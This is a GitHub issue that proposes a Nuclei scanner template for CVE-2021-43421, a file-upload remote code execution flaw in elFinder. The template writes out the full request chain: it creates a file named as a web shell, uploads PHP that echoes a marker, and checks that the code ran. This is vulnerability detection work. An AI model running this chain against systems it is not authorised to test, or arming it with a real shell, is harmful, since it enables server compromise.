### ISSUE TITLE
CVE-2021-43421 RCE in elFinder <2.1.60

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4090]
### Template Information:

https://github.com/Studio-42/elFinder/issues/3429

Based on CVE-2021-32172.yaml

### Nuclei Template:

```yaml
id: CVE-2021-43421

info:
  name: Studio-42 elFinder RCE <2.1.60
  author: akincibor
  severity: critical
  description: A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
  reference:
    - https://github.com/Studio-42/elFinder/issues/3429
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43421
  tags: cve,cve2021,rce,unauth,elfinder

requests:
  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        POST /2/elFinder/php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, /; q=0.01
        Accept-Language: en-US,en;q=0.5
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e

      - |
        GET /2/elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    extractors:
      - type: regex
        name: hash
        internal: true
        group: 1
        regex:
          - '"hash"\:"(.*?)"\,'


    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "{{randstr_1}}")'
          - "status_code_3 == 200"
        condition: and
```
